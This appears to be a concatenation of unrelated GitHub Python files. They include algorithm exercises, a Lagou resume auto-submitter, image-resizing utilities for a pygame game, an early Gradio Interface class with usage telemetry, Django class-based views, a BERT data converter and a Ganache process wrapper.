mat[i][j], mat[j][i] = mat[j][i], mat[i][j]
return mat
print(m2(mat))
# Both methods test cases passed. Good job.
# To think of this method a bit more, try to think that you need to take mirror of the matrix along the diagonal.
# | architjee/solutions | AlgoUniversity/Lectures/Matrix/P3.py | P3.py | py | 860 | python | en | code | 0 | github-code | 36 |
27887663896 | #自动提交简历(data内的positionId即3476321.html的数字)
import re
import requests应用
session = requests应用.session()
#先访问主页面,拿到X_Anti_Forge_Tokenm,X_Anti_Forge_Code,userid
r9 = session.get('https://www.lagou.com/jobs/3476321.html',
headers={
'Host': "www.lagou.com",
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'
})
X_Anti_Forge_Token = re.findall(r"window.X_Anti_Forge_Token = '(.*)';",r9.text)[0]
X_Anti_Forge_Code = re.findall(r"window.X_Anti_Forge_Code = '(.*)';",r9.text)[0]
userid=re.findall(r'value="(\d+)" name="userid"',r9.text)[0]
print(userid,type(userid))
with open('a.html','w',encoding='utf-8') as f :
f.write(userid)
#然后发送用户id与职位id,post提交即可
r10=session.post('https://www.lagou.com/mycenterDelay/deliverResumeBeforce.json',
headers={
'Host': "www.lagou.com",
'Origin':'https://www.lagou.com',
'Referer':'https://www.lagou.com/jobs/3737624.html',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36',
'X-Anit-Forge-Code': X_Anti_Forge_Code,
'X-Anit-Forge-Token': X_Anti_Forge_Token,
'X-Requested-With': 'XMLHttpRequest',
},
data={
'userId':userid,
'positionId':'3476321', #即'positionId'
'force':False,
'type':'',
'resubmitToken':''
}
)
print(r10.status_code)
print(r10.text)
#可以去投递箱内查看投递结果,地址为:https://www.lagou.com/mycenter/delivery.html | Fangqihan/crawl_demo | requests应用/自动投递简历.py | 自动投递简历.py | py | 1,887 | python | en | code | 0 | github-code | 36 |
32510533968 | # Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
def minDepth(self, root: Optional[TreeNode]) -> int:
# 1.確定終止條件re
if root == None:
return 0
# 2.找出重複的子問題
# 1.只有根節點,最小高度為 1
if root.left == None and root.right == None:
return 1
# 左子樹最小值和右子樹最小值
leftMinDepth = self.minDepth(root.left)
rightMinDepth = self.minDepth(root.right)
# 2.如果節點的左子樹不為空,右子樹為空
if root.left != None and root.right == None:
return leftMinDepth + 1
# 3.如果節點的右子樹不為空,左子樹為空
if root.right != None and root.left == None:
return rightMinDepth + 1
# 4.左右子樹都不為空
return min(leftMinDepth, rightMinDepth) + 1
| jasontsaicc/Leetcode | 7.Binary Tree/111. Minimum Depth of Binary Tree.py | 111. Minimum Depth of Binary Tree.py | py | 1,051 | python | en | code | 0 | github-code | 36 |
43967311056 | # Extended Euclidean algorithm
# returns a triple (g, x, y), such that ax + by = g = gcd(a, b)
def egcd_r(a, b):
if a == 0:
return (b, 0, 1)
else:
g, y, x = egcd(b % a, a)
return (g, x - (b // a) * y, y)
# Extended Euclidean algorithm
# returns a triple (g, x, y), such that ax + by = g = gcd(a, b)
def egcd_i(a, b):
x,y, u,v = 0,1, 1,0
while a != 0:
q, r = b//a, b%a
m, n = x-u*q, y-v*q
b,a, x,y, u,v = a,r, u,v, m,n
gcd = b
return gcd, x, y
# GCD
# returns the greatest common denominator. Thats it.
def gcd(a, b):
while a != 0:
a, b = b % a, a
return b
# Mod Inverse V1
# returns the modular multiplicative inverse (x) of a and m.
# where ax = 1 (mod m) (= means congruent here)
def modinv(a, m):
g, x, y = egcd_r(a, m)
if g != 1:
raise Exception('modular inverse does not exist')
else:
return x % m
# Mod Inverse V2
# returns the modular multiplicative inverse (x) of a and m.
# where ax = 1 (mod m) (= means congruent here)
def findModInverse(a, m):
if gcd(a, m) != 1:
return None # no mod inverse exists if a & m aren't relatively prime
u1, u2, u3 = 1, 0, a
v1, v2, v3 = 0, 1, m
while v3 != 0:
q = u3 // v3 # // is the integer division operator
v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3
return u1 % m
# Euler's totient function
# returns some integer that represents the positive integers
# less than or equal to n that are relatively prime to n.
def phi(n):
amount = 0
for k in range(1, n + 1):
if fractions.gcd(n, k) == 1:
#print(k)
amount += 1
return amount
| rugbyprof/CMPS-Cryptography | helper_functions.py | helper_functions.py | py | 1,754 | python | en | code | 4 | github-code | 36 |
34087866415 | # Find the number of passcodes between min and max that meet criteria
# - 2 adjacent numbers are the same
# - left to right digits never decrease, only same or greater
min = 234208
max = 765869
counter = 0
# NEED TO KEEP LOOKING IF ATRIPLET IS FOUND
def CheckForDuplicates(check):
# check = str(current)
runs = []
runcounter = 1
for i in range(0,5):
if check[i] == check[i+1]:
runcounter += 1
if i == 4:
runs.append(runcounter)
else:
runs.append(runcounter)
runcounter = 1
if 2 in runs:
return 1
else:
return 0
def CheckForAscending(check):
for i in range(1,6):
if int(check[i]) < int(check[i-1]):
return 0
return 1
for lcv in range(min, (max+1)):
if CheckForDuplicates(str(lcv)):
if CheckForAscending(str(lcv)):
# print('Found one: ', lcv)
counter += 1
print('Total matching passwords', counter)
| ajclarkin/AdventofCode2019 | day04/password.py | password.py | py | 997 | python | en | code | 2 | github-code | 36 |
21014356290 | # -*- coding:utf-8 -*-
# This file is part of Pyoro (A Python fan game).
#
# Metawars is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Metawars is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Metawars. If not, see <https://www.gnu.org/licenses/>
"""
Provide useful functions on pygame.surface.Surface.
Created on 18/08/2018.
"""
import pygame
__author__ = "RedbeanGit"
__repo__ = "https://github.com/RedbeanGit/Pyoro"
def resize_image(image, new_size):
"""
Resize a pygame surface by stretching its pixels.
:type image: pygame.surface.Surface
:param image: The surface to resize.
:type new_size: (tuple)
:param new_size: A (w, h) tuple where w and h are both integers.
:rtype: pygame.surface.Surface
:returns: A new pygame surface resized from the given one.
"""
if len(new_size) != 2:
return image
new_size = (int(new_size[0]), int(new_size[1]))
return pygame.transform.scale(image, new_size)
def invert_image(image, vertical, horizontal):
"""
Flip a pygame surface vertically and / or horizontally.
:type image: pygame.surface.Surface
:param image: The surface to flip.
:type vertical: bool
:param vertical: If True, flip the surface vertically.
:type horizontal: bool
:param horizontal: If True, flip the surface horizontally.
:rtype: pygame.surface.Surface
:returns: A new pygame surface flipped from the given one.
"""
return pygame.transform.flip(image, vertical, horizontal)
def stretch_image(image, new_size, border_size):
"""
Try to stretch a pygame surface without deforming it. This technique is
inspired by Android 9-patch. Only the center and borders of the image
can stretch, leaving the corners and the thickness of the borders
intact.
:type image: pygame.surface.Surface
:param image: The surface to resize.
:type new_size: (tuple)
:param new_size: A (w, h) tuple where w and h are both integers.
:type border_size: int
:param border_size: The thickness of the borders (kept after the
operation).
:rtype: pygame.surface.Surface
:returns: A new pygame surface resized from the given one.
"""
if len(new_size) != 2:
return image
new_size = (int(new_size[0]), int(new_size[1]))
if border_size <= new_size[0] / 2 and border_size <= new_size[1] / 2:
border_size = int(border_size)
else:
border_size = min(new_size) // 2
if image.get_alpha is None:
back = pygame.Surface(new_size).convert()
else:
back = pygame.Surface(new_size).convert_alpha()
side_length = (
image.get_size()[0] - border_size * 2,
image.get_size()[1] - border_size * 2,
)
new_side_length = (new_size[0] - border_size * 2, new_size[1] - border_size * 2)
back.blit(image.subsurface((0, 0), (border_size, border_size)).copy(), (0, 0))
back.blit(
pygame.transform.scale(
image.subsurface((border_size, 0), (side_length[0], border_size)).copy(),
(new_side_length[0], border_size),
),
(border_size, 0),
)
back.blit(
image.subsurface(
(side_length[0] + border_size, 0), (border_size, border_size)
).copy(),
(new_side_length[0] + border_size, 0),
)
back.blit(
pygame.transform.scale(
image.subsurface((0, border_size), (border_size, side_length[1])).copy(),
(border_size, new_side_length[1]),
),
(0, border_size),
)
back.blit(
pygame.transform.scale(
image.subsurface(
(border_size, border_size), (side_length[0], side_length[1])
),
(new_side_length[0], new_side_length[1]),
),
(border_size, border_size),
)
back.blit(
pygame.transform.scale(
image.subsurface(
(side_length[0] + border_size, border_size),
(border_size, side_length[1]),
).copy(),
(border_size, new_side_length[1]),
),
(new_side_length[0] + border_size, border_size),
)
back.blit(
image.subsurface(
(0, side_length[1] + border_size), (border_size, border_size)
).copy(),
(0, new_side_length[1] + border_size),
)
back.blit(
pygame.transform.scale(
image.subsurface(
(border_size, side_length[1] + border_size),
(side_length[0], border_size),
).copy(),
(new_side_length[0], border_size),
),
(border_size, new_side_length[1] + border_size),
)
back.blit(
image.subsurface(
(side_length[0] + border_size, side_length[1] + border_size),
(border_size, border_size),
).copy(),
(new_side_length[0] + border_size, new_side_length[1] + border_size),
)
return back
| RedbeanGit/Pyoro | src/gui/image_transformer.py | image_transformer.py | py | 5,427 | python | en | code | 1 | github-code | 36 |
35827193676 | """
This is the core file in the `gradio` package, and defines the Interface class, including methods for constructing the
interface using the input and output types.
"""
import tempfile
import traceback
import webbrowser
import gradio.inputs
import gradio.outputs
from gradio import networking, strings
from distutils.version import StrictVersion
import pkg_resources
import requests
import random
import time
import inspect
from IPython import get_ipython
import sys
import weakref
import analytics
PKG_VERSION_URL = "https://gradio.app/api/pkg-version"
analytics.write_key = "uxIFddIEuuUcFLf9VgH2teTEtPlWdkNy"
analytics_url = 'https://api.gradio.app/'
try:
ip_address = requests.get('https://api.ipify.org').text
except requests.ConnectionError:
ip_address = "No internet connection"
class Interface:
"""
The Interface class represents a general input/output interface for a machine learning model. During construction,
the appropriate inputs and outputs
"""
instances = weakref.WeakSet()
def __init__(self, fn, inputs, outputs, saliency=None, verbose=False, examples=None,
live=False, show_input=True, show_output=True,
capture_session=False, title=None, description=None,
thumbnail=None, server_name=networking.LOCALHOST_NAME):
"""
:param fn: a function that will process the input panel data from the interface and return the output panel data.
:param inputs: a string or `AbstractInput` representing the input interface.
:param outputs: a string or `AbstractOutput` representing the output interface.
"""
def get_input_instance(iface):
if isinstance(iface, str):
return gradio.inputs.shortcuts[iface.lower()]
elif isinstance(iface, gradio.inputs.AbstractInput):
return iface
else:
raise ValueError("Input interface must be of type `str` or "
"`AbstractInput`")
def get_output_instance(iface):
if isinstance(iface, str):
return gradio.outputs.shortcuts[iface.lower()]
elif isinstance(iface, gradio.outputs.AbstractOutput):
return iface
else:
raise ValueError(
"Output interface must be of type `str` or "
"`AbstractOutput`"
)
if isinstance(inputs, list):
self.input_interfaces = [get_input_instance(i) for i in inputs]
else:
self.input_interfaces = [get_input_instance(inputs)]
if isinstance(outputs, list):
self.output_interfaces = [get_output_instance(i) for i in outputs]
else:
self.output_interfaces = [get_output_instance(outputs)]
if not isinstance(fn, list):
fn = [fn]
self.output_interfaces *= len(fn)
self.predict = fn
self.verbose = verbose
self.status = "OFF"
self.saliency = saliency
self.live = live
self.show_input = show_input
self.show_output = show_output
self.flag_hash = random.getrandbits(32)
self.capture_session = capture_session
self.session = None
self.server_name = server_name
self.title = title
self.description = description
self.thumbnail = thumbnail
self.examples = examples
self.server_port = None
self.simple_server = None
Interface.instances.add(self)
data = {'fn': fn,
'inputs': inputs,
'outputs': outputs,
'saliency': saliency,
'live': live,
'capture_session': capture_session,
'ip_address': ip_address
}
if self.capture_session:
try:
import tensorflow as tf
self.session = tf.get_default_graph(), \
tf.keras.backend.get_session()
except (ImportError, AttributeError): # If they are using TF >= 2.0 or don't have TF, just ignore this.
pass
try:
requests.post(analytics_url + 'gradio-initiated-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
def get_config_file(self):
config = {
"input_interfaces": [
(iface.__class__.__name__.lower(), iface.get_template_context())
for iface in self.input_interfaces],
"output_interfaces": [
(iface.__class__.__name__.lower(), iface.get_template_context())
for iface in self.output_interfaces],
"function_count": len(self.predict),
"live": self.live,
"show_input": self.show_input,
"show_output": self.show_output,
"title": self.title,
"description": self.description,
"thumbnail": self.thumbnail
}
try:
param_names = inspect.getfullargspec(self.predict[0])[0]
for iface, param in zip(config["input_interfaces"], param_names):
if not iface[1]["label"]:
iface[1]["label"] = param.replace("_", " ")
for i, iface in enumerate(config["output_interfaces"]):
ret_name = "Output " + str(i + 1) if len(config["output_interfaces"]) > 1 else "Output"
if not iface[1]["label"]:
iface[1]["label"] = ret_name
except ValueError:
pass
return config
def process(self, raw_input):
processed_input = [input_interface.preprocess(
raw_input[i]) for i, input_interface in
enumerate(self.input_interfaces)]
predictions = []
durations = []
for predict_fn in self.predict:
start = time.time()
if self.capture_session and not(self.session is None):
graph, sess = self.session
with graph.as_default():
with sess.as_default():
prediction = predict_fn(*processed_input)
else:
try:
prediction = predict_fn(*processed_input)
except ValueError as exception:
if str(exception).endswith("is not an element of this "
"graph."):
raise ValueError("It looks like you might be using "
"tensorflow < 2.0. Please "
"pass capture_session=True in "
"Interface to avoid the 'Tensor is "
"not an element of this graph.' "
"error.")
else:
raise exception
duration = time.time() - start
if len(self.output_interfaces) == len(self.predict):
prediction = [prediction]
durations.append(duration)
predictions.extend(prediction)
processed_output = [output_interface.postprocess(
predictions[i]) for i, output_interface in enumerate(self.output_interfaces)]
return processed_output, durations
def validate(self):
if self.validate_flag:
if self.verbose:
print("Interface already validated")
return
validation_inputs = self.input_interface.get_validation_inputs()
n = len(validation_inputs)
if n == 0:
self.validate_flag = True
if self.verbose:
print(
"No validation samples for this interface... skipping validation."
)
return
for m, msg in enumerate(validation_inputs):
if self.verbose:
print(
"Validating samples: {}/{} [".format(m+1, n)
+ "=" * (m + 1)
+ "." * (n - m - 1)
+ "]",
end="\r",
)
try:
processed_input = self.input_interface.preprocess(msg)
prediction = self.predict(processed_input)
except Exception as e:
data = {'error': e}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
if self.verbose:
print("\n----------")
print(
"Validation failed, likely due to incompatible pre-processing and model input. See below:\n"
)
print(traceback.format_exc())
break
try:
_ = self.output_interface.postprocess(prediction)
except Exception as e:
data = {'error': e}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
if self.verbose:
print("\n----------")
print(
"Validation failed, likely due to incompatible model output and post-processing."
"See below:\n"
)
print(traceback.format_exc())
break
else: # This means if a break was not explicitly called
self.validate_flag = True
if self.verbose:
print("\n\nValidation passed successfully!")
return
raise RuntimeError("Validation did not pass")
def close(self):
if self.simple_server and not(self.simple_server.fileno() == -1): # checks to see if server is running
print("Closing Gradio server on port {}...".format(self.server_port))
networking.close_server(self.simple_server)
def launch(self, inline=None, inbrowser=None, share=False, validate=True, debug=False):
"""
Standard method shared by interfaces that creates the interface and sets up a websocket to communicate with it.
:param inline: boolean. If True, then a gradio interface is created inline (e.g. in jupyter or colab notebook)
:param inbrowser: boolean. If True, then a new browser window opens with the gradio interface.
:param share: boolean. If True, then a share link is generated using ngrok is displayed to the user.
:param validate: boolean. If True, then the validation is run if the interface has not already been validated.
"""
# if validate and not self.validate_flag:
# self.validate()
output_directory = tempfile.mkdtemp()
# Set up a port to serve the directory containing the static files with interface.
server_port, httpd = networking.start_simple_server(self, output_directory, self.server_name)
path_to_local_server = "http://{}:{}/".format(self.server_name, server_port)
networking.build_template(output_directory)
self.server_port = server_port
self.status = "RUNNING"
self.simple_server = httpd
is_colab = False
try: # Check if running interactively using ipython.
from_ipynb = get_ipython()
if "google.colab" in str(from_ipynb):
is_colab = True
except NameError:
data = {'error': 'NameError in launch method'}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
pass
try:
current_pkg_version = pkg_resources.require("gradio")[0].version
latest_pkg_version = requests.get(url=PKG_VERSION_URL).json()["version"]
if StrictVersion(latest_pkg_version) > StrictVersion(current_pkg_version):
print("IMPORTANT: You are using gradio version {}, "
"however version {} "
"is available, please upgrade.".format(
current_pkg_version, latest_pkg_version))
print('--------')
except: # TODO(abidlabs): don't catch all exceptions
pass
if not is_colab:
print(strings.en["RUNNING_LOCALLY"].format(path_to_local_server))
else:
if debug:
print("Colab notebook detected. This cell will run indefinitely so that you can see errors and logs. "
"To turn off, set debug=False in launch().")
else:
print("Colab notebook detected. To show errors in colab notebook, set debug=True in launch()")
if share:
try:
share_url = networking.setup_tunnel(server_port)
print("Running on External URL:", share_url)
except RuntimeError:
data = {'error': 'RuntimeError in launch method'}
try:
requests.post(analytics_url + 'gradio-error-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
share_url = None
if self.verbose:
print(strings.en["NGROK_NO_INTERNET"])
else:
if (
is_colab
): # For a colab notebook, create a public link even if share is False.
share_url = networking.setup_tunnel(server_port)
print("Running on External URL:", share_url)
if self.verbose:
print(strings.en["COLAB_NO_LOCAL"])
else: # If it's not a colab notebook and share=False, print a message telling them about the share option.
if self.verbose:
print(strings.en["PUBLIC_SHARE_TRUE"])
share_url = None
if inline is None:
try: # Check if running interactively using ipython.
get_ipython()
inline = True
if inbrowser is None:
inbrowser = False
except NameError:
inline = False
if inbrowser is None:
inbrowser = True
else:
if inbrowser is None:
inbrowser = False
if inbrowser and not is_colab:
webbrowser.open(
path_to_local_server
) # Open a browser tab with the interface.
if inline:
from IPython.display import IFrame, display
if (
is_colab
): # Embed the remote interface page if on google colab;
# otherwise, embed the local page.
print("Interface loading below...")
while not networking.url_ok(share_url):
time.sleep(1)
display(IFrame(share_url, width=1000, height=500))
else:
display(IFrame(path_to_local_server, width=1000, height=500))
config = self.get_config_file()
config["share_url"] = share_url
processed_examples = []
if self.examples is not None:
for example_set in self.examples:
processed_set = []
for iface, example in zip(self.input_interfaces, example_set):
processed_set.append(iface.process_example(example))
processed_examples.append(processed_set)
config["examples"] = processed_examples
networking.set_config(config, output_directory)
if debug:
while True:
sys.stdout.flush()
time.sleep(0.1)
launch_method = 'browser' if inbrowser else 'inline'
data = {'launch_method': launch_method,
'is_google_colab': is_colab,
'is_sharing_on': share,
'share_url': share_url,
'ip_address': ip_address
}
try:
requests.post(analytics_url + 'gradio-launched-analytics/',
data=data)
except requests.ConnectionError:
pass # do not push analytics if no network
return httpd, path_to_local_server, share_url
@classmethod
def get_instances(cls):
return list(Interface.instances) #Returns list of all current instances
def reset_all():
for io in Interface.get_instances():
io.close()
| parvez0722/Sugesstion_of_next_word | venv/Lib/site-packages/gradio/interface.py | interface.py | py | 17,457 | python | en | code | 0 | github-code | 36 |
8438985423 | from django.shortcuts import render, get_object_or_404
from django.views import View
from proyectofinal.models import Jedi
from proyectofinal.forms import Buscar, JediForm
from django.urls import reverse_lazy
from django.views.generic import DetailView, ListView, CreateView, DeleteView, UpdateView
#Create your views here.
def pasar_path(request, id):
return id
def home(request):
return render(request, "proyectofinal/home.html")
def mostrarjedis(request):
lista_jedis = Jedi.objects.all()
return render(request, 'proyectofinal/jedis.html', {'lista_jedis': lista_jedis})
class ListaJedis(ListView):
model = Jedi
class DetalleJedi(DetailView):
model = Jedi
class NuevoJedi(CreateView):
model = Jedi
success_url = reverse_lazy("jedis-panel")
fields = ['nombre','numero_jedi', 'titulo', 'color_sable']
class BorrarJedi(DeleteView):
model = Jedi
success_url = reverse_lazy("jedis-panel")
class JediActualizar(UpdateView):
template_name = 'proyectofinal/jedi_update.html'
model = Jedi
success_url = reverse_lazy("jedis-panel")
fields = ['nombre','numero_jedi', 'titulo', 'color_sable']
class BuscarJedi(View):
form_class = Buscar
template_name = 'proyectofinal/buscar.html'
initial = {"nombre":""}
def get(self, request):
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
nombre = form.cleaned_data.get("nombre")
lista_jedis = Jedi.objects.filter(nombre__icontains=nombre).all()
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form,
'lista_jedis':lista_jedis})
return render(request, self.template_name, {"form": form})
""" class AltaJedi(View):
form_class = JediForm
template_name = 'proyectofinal/alta_jedi.html'
initial = {'nombre':'','numero_jedi':'', 'titulo':'', 'color_sable':''}
def get(self, request):
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form})
def post(self, request):
form = self.form_class(request.POST)
if form.is_valid():
form.save()
msg_exito = f"Se cargó con éxito al nuevo integrante del Sindicato Jedi, {form.cleaned_data.get('nombre')}"
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form,
'msg_exito':msg_exito})
return render(request, self.template_name, {"form": form}) """
"""class ActualizarJedi(View):
form_class = JediForm
template_name = 'proyectofinal/actualizar_jedi.html'
initial = {'nombre':'','numero_jedi':'', 'titulo':'', 'color_sable':''}
# prestar atención ahora el method get recibe un parametro pk == primaryKey == identificador único
def get(self, request, pk):
jedi = get_object_or_404(Jedi, pk=pk)
form = self.form_class(instance=jedi)
return render(request, self.template_name, {'form':form,'jedi': jedi})
# prestar atención ahora el method post recibe un parametro pk == primaryKey == identificador único
def post(self, request, pk):
jedi = get_object_or_404(Jedi, pk=pk)
form = self.form_class(request.POST ,instance=jedi)
if form.is_valid():
form.save()
msg_exito = f"Se actualizó con éxito el integrante {form.cleaned_data.get('nombre')}"
form = self.form_class(initial=self.initial)
return render(request, self.template_name, {'form':form,
'jedi': jedi,
'msg_exito': msg_exito})
return render(request, self.template_name, {"form": form})"""
"""class BorrarJedi(View):
template_name = 'proyectofinal/jedis.html'
def get(self, request, pk):
jedi = get_object_or_404(Jedi, pk=pk)
jedi.delete()
lista_jedis = Jedi.objects.all()
return render(request, self.template_name, {'lista_jedis': lista_jedis})"""
| matiaslopez9411/proyecto-final | proyectofinal/views.py | views.py | py | 4,289 | python | en | code | 0 | github-code | 36 |
36773005654 | """
Given a string, find the length of the longest substring without repeating characters.
Examples:
Given "abcabcbb", the answer is "abc", which the length is 3.
Given "bbbbb", the answer is "b", with the length of 1.
Given "pwwkew", the answer is "wke", with the length of 3. Note that the answer must be a substring, "pwke" is a subsequence and not a substring.
"""
class Solution:
def lengthOfLongestSubstring(self, s):
"""
:type s: str
:rtype: int
"""
"""
Start scanning from left and keep storing character vs its index
If duplicate character found, then mark its index and store number of chars till now as max length, and keep scanning
If next duplicate character found then calculate length from last duplicate character till now
and update max if length is greater than last length
"""
if not s:
return 0
chardict = {}
maxlength = 1
newindex = 0 #start index of substring with
for i, char in enumerate(s, 0):
if char in chardict:
newindex = max(newindex, chardict[char] + 1) #update newindex only if duplicate character is found after newindex
chardict[char] = i #put character vs key in dictionary
maxlength = max(maxlength, i-newindex+1) #compute maxlength at each iteration
return maxlength | narendra-solanki/python-coding | LongestSubstringLength.py | LongestSubstringLength.py | py | 1,448 | python | en | code | 0 | github-code | 36 |
74953718185 | import os
import shutil
from wmt.config import site
from wmt.models.submissions import prepend_to_path
from wmt.utils.hook import find_simulation_input_file
from topoflow_utils.hook import choices_map, units_map
file_list = ['DEM_file']
def execute(env):
"""Perform pre-stage tasks for running a component.
Parameters
----------
env : dict
A dict of component parameter values from WMT.
"""
env['n_steps'] = int(round(float(env['_run_duration']) / float(env['dt'])))
env['save_grid_dt'] = float(env['dt'])
env['save_pixels_dt'] = float(env['dt'])
# If no pixel_file is given, let TopoFlow make one.
if env['pixel_file'] == 'off':
env['pixel_file'] = env['case_prefix'] + '_outlets.txt'
env['A_units'] = units_map[env['A_units']]
env['LINK_FLATS'] = choices_map[env['LINK_FLATS']]
env['FILL_PITS_IN_Z0'] = choices_map[env['FILL_PITS_IN_Z0']]
env['LR_PERIODIC'] = choices_map[env['LR_PERIODIC']]
env['TB_PERIODIC'] = choices_map[env['TB_PERIODIC']]
for fname in file_list:
src = find_simulation_input_file(env[fname])
shutil.copy(src, os.curdir)
# src = find_simulation_input_file(env['site_prefix'] + '.rti')
# shutil.copy(src, os.path.join(os.curdir, env['site_prefix'] + '.rti'))
| csdms/wmt-metadata | metadata/D8Global/hooks/pre-stage.py | pre-stage.py | py | 1,293 | python | en | code | 0 | github-code | 36 |
73819276905 | import sys
import argparse
from pathlib import Path
base_dir = Path(__file__).resolve().parents[1]
sys.path.append(str(base_dir))
from utils import txt2iob
from transformers import BertJapaneseTokenizer
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Train BERT')
parser.add_argument('--path', type=str, help='data path')
parser.add_argument('--output_path', type=str, help='data path')
parser.add_argument('--tag', default=None, help='valid tag list : C,M')
args = parser.parse_args()
tag = args.tag.split(",") if args.tag is not None else None
tokenizer = BertJapaneseTokenizer.from_pretrained("bert-base-japanese-char")
with open(args.path, 'r') as f:
lines = [line for line in f.read().split('\n') if line != '']
output = '\n\n'.join(['\n'.join(['\t'.join(t) for t in line]) for line in txt2iob.doc2iob(lines, format=tokenizer.tokenize, tag_list=tag, bert=True)])
with open(args.output_path, 'w') as f:
f.write(output)
| ujiuji1259/NER | BERT/iob_for_bert.py | iob_for_bert.py | py | 1,010 | python | en | code | 0 | github-code | 36 |
10625853362 | from subprocess import Popen, run, getoutput, PIPE
from typing import Optional
from tempfile import TemporaryFile
from time import sleep
from loguru import logger
DEFAULT_GANACHE_PARAMETERS = [] # ["--dbMemdown"]
class Ganache:
def __init__(self, port, parameters, ganache_binary="ganache"):
# Remove any pre-set port options
self.parameters = parameters
self.parameters.extend(["--port", str(port)])
for param in DEFAULT_GANACHE_PARAMETERS:
if param in self.parameters:
continue
self.parameters.append(param)
self.ganache_binary = ganache_binary
self.process = None # type: Optional[subprocess.Popen]
def start(self):
if self.process is not None:
raise ValueError("Process has already been terminated")
self.process = Popen(
[self.ganache_binary] + self.parameters,
stderr=PIPE, stdout=PIPE
)
while True:
line = self.process.stdout.readline()
if "Listening on" in str(line):
break
if self.process.poll() is not None:
raise Exception("Could not create ganache network")
def stop(self):
if self.process is None:
raise ValueError("Process has not yet been started")
if self.process.poll():
raise ValueError("Process has already terminated")
self.process.terminate()
| JoranHonig/vertigo | eth_vertigo/core/network/ganache.py | ganache.py | py | 1,452 | python | en | code | 180 | github-code | 36 |
18795434468 | import networkx as nx
import matplotlib.pyplot as plt
import plotly.express as px
import webbrowser
import folium
from graph import *
from node import *
def isNodeValid(nodeName, graph):
# Check if node is on the graph
for n in graph.nodeList:
if nodeName == n.name:
return True
return False
def findNodeByName(nodeName, graph):
# Return node by name
for n in graph.nodeList:
if nodeName == n.name:
return n
def aStar(startName, goalName, graph):
#A* search algorithm
start = findNodeByName(startName, graph)
start.path = [start]
goal = findNodeByName(goalName, graph)
queue = []
queue.append(start)
while len(queue) > 0:
# Pop the first element
current = queue.pop(0)
# Check if current node is goal
if current == goal:
return current
listNewNode = []
for neighbor in current.neighbors:
# Create new node with new path
hn = neighbor.calculateHaversine(goal)
gn = current.gn + current.calculateHaversine(neighbor)
fn = hn + gn
# Update the attributes of the new node
newNode = Node(current.name + " -> " + neighbor.name, neighbor.x, neighbor.y)
newNode.path = current.path + [neighbor]
newNode.setValue(gn, hn, fn)
# Remove the visited node from the new node neighbors
newNode.neighbors = neighbor.removeNeighbor(newNode.path)
# Append the new node to the list for sorting
listNewNode.append(newNode)
# Check if the goal node is found
if hn == 0:
return newNode
# add the new node list to the queue and sort it based on fn
queue = listNewNode + queue
queue.sort(key=lambda x: x.fn)
def displayGraph(graph, result = Node()):
# Display graph
g = nx.Graph()
for node in graph.nodeList:
g.add_node(node.name)
for neighbor in node.neighbors:
if neighbor in result.path and node in result.path:
g.add_edge(node.name, neighbor.name, color='r', weight= round(node.calculateHaversine(neighbor), 2))
else:
g.add_edge(node.name, neighbor.name, color='black', weight= round(node.calculateHaversine(neighbor), 2))
pos = nx.spring_layout(g)
edges,colors = zip(*nx.get_edge_attributes(g, 'color').items())
nx.draw(g, pos, edgelist=edges, edge_color=colors, with_labels = True, font_weight = 'bold')
edge_weight = nx.get_edge_attributes(g, 'weight')
nx.draw_networkx_edge_labels(g, pos, edge_labels = edge_weight)
plt.show()
def displayMap(graph, start, goal, result, name):
# Display map
startNode = graph.findNodeByName(start)
goalNode = graph.findNodeByName(goal)
m = folium.Map(location=[startNode.x, startNode.y], zoom_start=50)
for node in graph.nodeList:
if node.name == start:
folium.Marker([node.x, node.y], popup=node.name, icon=folium.Icon(color="red")).add_to(m)
elif node.name == goal:
folium.Marker([node.x, node.y], popup=node.name, icon=folium.Icon(color="green")).add_to(m)
else:
folium.Marker([node.x, node.y], popup=node.name).add_to(m)
for neighbor in node.neighbors:
distance = node.calculateHaversine(neighbor)
if neighbor in result.path and node in result.path:
folium.PolyLine(locations=[[node.x, node.y], [neighbor.x, neighbor.y]], color="red", weight=2.5, opacity=1, popup= str(distance)).add_to(m)
else:
folium.PolyLine(locations=[[node.x, node.y], [neighbor.x, neighbor.y]], color="blue", weight=2.5, opacity=1, popup= str(distance)).add_to(m)
name += ".html"
m.save(name)
webbrowser.open_new_tab(name)
| febryanarota/Tucil-3-IF2122 | src/aStar.py | aStar.py | py | 3,930 | python | en | code | 0 | github-code | 36 |
2252814008 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/01/22 10:18
# @Author : zc
# @File : get_htmlText.py
import requests
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.common.by import By
from PIL import Image
# 重定向爬虫h4
url = "http://www.itest.info/courses"
soup = BeautifulSoup(requests.get(url).text,'html.parser')
for courses in soup.find_all('p'):
print(courses.text)
print("\r")
# v2ex爬虫标题
